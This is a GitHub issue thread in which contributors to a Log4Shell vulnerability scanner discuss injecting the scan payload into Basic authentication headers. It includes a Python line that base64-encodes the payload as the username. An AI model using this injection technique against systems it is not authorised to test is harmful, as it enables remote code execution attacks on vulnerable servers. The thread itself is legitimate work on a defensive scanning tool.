Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Feature Request]: Support basic authentication and basic auth injection #81

Open
axel3rd opened this issue Dec 17, 2021 · 3 comments · Fixed by axel3rd/log4j-scan#1 · May be fixed by #95
Open

[Feature Request]: Support basic authentication and basic auth injection #81

axel3rd opened this issue Dec 17, 2021 · 3 comments · Fixed by axel3rd/log4j-scan#1 · May be fixed by #95

Comments

@axel3rd
Copy link
Contributor

axel3rd commented Dec 17, 2021

When basic-authentication is used for legacy applications, providing a valid login/password to request the "application home" and not only the "application login" page gives more chances to check if application is vulnerable.

Providing --basic-auth-user & --basic-auth-password parameters as preemptive basic authentication could be useful.

In addition, for this kind of application, even if any headers are logged with log4j, the user can sometime be logged after basic-auth decoded64 content (real use case found).

So having a --basic-auth-injection parameter with inject default payload as basic-auth user can be useful (not cumulative with --basic-auth-user, logically incompatible):

    if args.basic_inject:
        fuzzing_headers["Authorization"] = 'Basic %s' % base64.b64encode((payload + ':fakepassword').encode('utf-8')).decode()

If considered as relevant, I can provide a PR.

@mazen160
Copy link
Contributor

Hi @axel3rd,

This is totally valid and relevant use-case. I thought about adding it automatically when Authorization header is in Headers list.

I saw one tweet that had a similar pattern:

FGuVLmnXIAMh5--

@axel3rd
Copy link
Contributor Author

axel3rd commented Dec 17, 2021

I thought about adding it automatically when Authorization header is in Headers list.

There are many Authorization type (Basic, Bearer, ...) as we can see on your screenshot.
In theory we can have multiple Authorization type on same request (so thread) ... but I have never saw that in "real life".

Perhaps --authorization-injection=basic is a better name/value for this parameter.
In the future some other cumulative value --authorization-injection=basic,bearer,oauth can exist, even if I have not the concrete implementation now ^^.

But this kind of approach breaks the "adding it automatically when Authorization header is in Headers list", because it doesn't say which type of authorization we need to inject.

@axel3rd
Copy link
Contributor Author

axel3rd commented Dec 23, 2021

Reopen for merge in original repo.

Testable from https://github.com/axel3rd/log4j-scan

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
2 participants